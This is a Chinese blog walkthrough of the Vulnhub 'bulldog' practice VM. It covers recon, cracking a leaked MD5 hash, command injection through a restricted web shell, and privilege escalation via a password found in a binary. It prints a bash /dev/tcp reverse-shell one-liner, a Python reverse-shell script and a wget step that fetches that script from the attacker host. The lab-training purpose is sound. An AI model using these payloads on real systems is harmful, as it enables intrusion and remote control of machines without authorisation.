Vulnhub--bulldog

最新推荐文章于 2024-07-02 11:36:08 发布
最新推荐文章于 2024-07-02 11:36:08 发布
阅读量209 收藏
点赞数
分类专栏: Vulnhub 文章标签: linux python shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Oavinci/article/details/115374666
版权
配置:
VirtualBox运行靶机bulldog,网卡设置为Host-only;
VMware下运行kali作为攻击机,网卡设置为桥接模式Vritual box Host-only
 
Kali:192.168.56.102
bulldog:192.168.56.103
 
netdiscover -r 192.168.56.0/24
发现靶机IP:192.168.56.103
 
nmap -T4 -A -v -p- 192.168.56.103
开放了23、80、8080三个端口,发现ssh服务和web服务
 
dirsearch扫描下目录
 
访问/dev发现一个shell,但目前没登录还不能使用
查看/dev源代码发现
将Sarah的mad5值解码得到bulldoglover
访问/admin成功登录,提示没有权限
 
Linux提权
访问之前发现的/dev/shell
显示可以执行命令但只可以执行以上命令,尝试用&进行绕过
 
kali启动监听
nc -lvnp 4444
 
在/dev/shell输入
ls &&echo "bash -i >& /dev/tcp/192.168.56.102/4444 0>&1" | bash
 
拿到shell
 
cat /etc/passwd
 
cd /home/bulldogadmin
查看包括隐藏文件的全部文件
ls -la
 
查看.hiddenadmindirectory文件, 有note和customPermissionApp
note提示django用户有时有root权限
cat打开customPermissionApp文件都是乱码,用strings打开
strings customPermissionApp
发现密码:SUPERultimatePASSWORDyouCANTget
 
sudo在你输入密码的时候本质上是读取了键盘,而不是bash里面输入的字符。因此为了能够输入密码,我们必须模拟一个终端设备。python就有这样的功能。
用python调用本地的shell命令,利用python pty模块的shell来进行交互
 
python -c 'import pty;pty.spawn("/bin/sh")'
sudo su
 
输入密码拿到root权限
 
读取flag文件
 
 
另一种shell反弹方法:
在Kali上用python搭建一个简单HTTP服务器
python -m SimpleHTTPServer 80
 
shell脚本python-shell.py 
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.56.102",4444))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/bash","-i"])
把shell放到搭建的网站目录下
在192.168.56.103/dev/shell执行以下命令
pwd&wget http://192.168.56.102/python-shell.py
在kali监听
nc -lvnp 4444
 
/dev/shell下继续执行反弹脚本
pwd&python python-shell.py
 
kali得到shell
 
 
 
FTOrange
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vulnhub靶机bulldog渗透笔记
liver100day的博客
05-18 267
bulldog靶机渗透笔记 靶机环境搭建 攻击渗透机:kali IP地址:192.168.75.128 靶机:bulldog ip地址:未知 靶机下载链接:https://download.vulnhub.com/bulldog/bulldog.ova 在这里就不介绍虚拟机的安装方式了,但是要记得把攻击机和靶机的网络连接方式都改为桥接模式 渗透过程 1.信息收集 netdiscover 来确认目标靶机IP地址,会扫描出同网段中除本机外的其他存活主机 ...
vulnhub bulldog
dfhjlll的博客
02-11 287
配置环境 bulldog需要在virtualbox虚拟机下运行,导入后,网卡选择仅主机模式,打开后会自动出现ip ip:192.168.56.101 点开vmware中的虚拟选项编辑器中 点击更改设置,让vmware桥接至VirtualBox Host-Only Ethernet Adapter kali在VMware下运行,设置成桥接模式 打开,查看ip :192.168.56.102 使用...
bulldog-vulnhub
weixin_43841336的博客
07-18 153
1.nmap扫描存活主机,找到靶机(192.168.34.160) 2.nmap -sV -p0-65535 -T4扫描开放端口 80端口和8080端口一样, 3.用dirb扫描一下 访问/dev 下面有个web-shell进去以后需要登陆 打开源码邮件后面都有MD5加密后的字符串,解密ddf45997a7e18a25ad5f5cf222da64814dd060d5为bulldog,账号为nic...
Vulnhub系列】bulldog
大方子
09-27 1833
=========================== 个人收获: 1.dirb挖掘网页目录 2.Linux 可以用&同时执行多条命令 3.Kali利用Python搭建简单HTTP服务器 4.python写的shell反弹脚本 5.利用python pty模块的shell来进行交互 ============================ 下载地址:https://d...
vulnhub渗透系列之bulldog
来到了学渣的博客
01-20 1670
我是啊锋,一个努力的学渣,作为一个刚进入安全大门的小白,我希望能把自己所学到的东西总结出来,分享到博客上,可以一起进步,一起交流,一起学习。 实验过程总结: 1. 对端口信息扫描、信息的收集 2. 用dirb扫出了许多关键目录 3. 仔细观察每一个细节,这个靶机主要在/dev目录处前端源码泄露了MD5密码信息 4. 登录了管理员账号后可以在/dev/shell页面利用命令注入漏洞 5. 搭建临时...
vuInhub靶场实战系列-bulldog-1
06-03
vuInhub靶场实战系列-bulldog-1
BULLDOG-开源
05-27
【标题】"BULLDOG-开源"所涉及的知识点主要围绕着开源工作流解决方案Bulldog以及与其关联的J2EE容器和Tomcat展开。 首先,Bulldog作为一个开源项目,意味着它的源代码对公众开放,允许用户查看、使用、修改并分发...
atomic-bulldog-grid::office_building:基于CSS网格布局CSS(SCSS)网格,具有@supports后退到flexbox
02-05
原子牛头犬网格 :collision: :dog_face: CSS(SCSS)网格,基于具有@supportsCSS网格布局回退到flexbox... Atomic Bulldog是基于原子设计方法的Scss(Sass)样板。 它集成了Node KSS以自动生成实时样式指南/样式库。
Bulldog-Bucks:一个用于管理Gonzaga的Bulldog Bucks的Android应用程序
05-14
Bulldog Bucks专为Gonzaga大学的学生设计,可快速轻松地管理他们的Bulldog Bucks。 这个Android应用程式的灵感来自创建 。 学生ID和PIN仅在本地存储在移动设备上。 从安装android应用程序,或从此存储库下载源...
bulldog-books:UGA CSCI 4050的在线书店。使用React和Node创建
03-29
布尔道夫书 这是一个使用MERN堆栈为UGA CSCI 4050创建的oneline书店项目。 入门 有关安装项目的说明,请查看我们的github Wiki。 依存关系 npm MongoDB的 作者 加里·巴恩斯 亨特·威尔金斯(Hunter Wilkins) ...
Vulnhub靶场题解
08-24
介绍靶场的习题解答技巧,由红日团队精心编制,红日团队凭借多年经验于本文档
Vulnhub-Bulldog靶机实战
御七彩虹猫
03-24 1432
Vulnhub-Bulldog靶机实战
vulnhubbulldog 1实战攻略
weixin_43862283的博客
04-15 501
vulnhubbulldog 1实战攻略 0x01 环境配置 bulldg 1 难度:初学者 目标:提权到root权限并查看flag 攻击机:kali linux,IP地址192.168.34.179 靶机: bulldog,IP地址192.168.34.160(桥接模式) 下载地址:https://www.dropbox.com/s/ygzfkfhyatbfybr/bulldog.ova?dl...
【渗透测试】靶机渗透Vulnhub-bulldog
SunnyCat
06-01 2509
目录前言一、bulldog靶机安装二、bulldog靶机渗透1、信息搜集2、Web渗透--后台登录3、Web渗透--命令注入&nc反弹shell4、权限提升渗透步骤回顾感悟 前言 bulldog靶机的渗透有很多的前辈都做了教程,我这篇也是参考了许多前辈的博客,但是中间还是有很多不懂得地方,官方说有两条路可以拿到root,我只找到了一条。以下内容均是我作为一个菜鸡实操之后的所得,为了留个印子记下来。 参考博客: https://blog.csdn.net/Eastmount/article/detai
Vulnhub靶场渗透测试系列bulldog(命令注入和sudo提权)
qq_45722813的博客
11-15 2606
Vulnhub靶场渗透测试系列-bulldog 靶机地址:https://www.vulnhub.com/entry/bulldog-1%2C211/ 下载将其导入VMware,设置网络模式为NAT模式,开启靶机虚拟机 在kali攻击机使用命令nmap -Pn 192.168.172.1/24来获取靶机的IP地址 这里如果实在扫不出来靶机IP地址的话参考这篇文章来进行设置 https://blog.csdn.net/qq_45722813/article/details/121324686 得到靶机IP地
带妹玩转Vulnhub【一】
BadRer的博客
09-27 7553
前言 题目是不想在刷了,想学一学渗透测试的知识。 由于是开头之作,所以会写的比较的详细,尽量让大家少走弯路。 带妹是不可能带妹的,这辈子都不可能带妹的
正式邀测! OS Copilot——一款基于大模型构建的 Linux 智能操作系统助手
最新发布
weixin_60347558的博客
07-02 507
重塑操作系统交互新体验,开启您的智能化系统管理之旅
Linux】TCP协议【下二】{流量控制/滑动窗口/延迟应答/捎带应答/拥塞控制}
A progressive ape!
07-02 1034
Linux】TCP协议【下二】{流量控制/滑动窗口/延迟应答/捎带应答/拥塞控制}
Linux多进程和多线程(三)进程间通讯-信号处理方式和自定义处理函数
gopher9511的博客
06-30 781
123456678910// 用户自定义信号1112131415161718192021。
实现一个双向适配器实例,使得猫(Cat)可以学狗(Dog)叫,狗可以学猫抓老鼠。绘制相应类图并使用代码编程模拟。
04-01
bulldog = Bulldog() cat = Cat() adapter = DogAdapter(bulldog) print(adapter.catch_mice()) # Output: Woof! Woof! ``` 在上面的代码中,我们有一个Target接口 `Cat`,它定义了一个`catch_mice()`方法,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值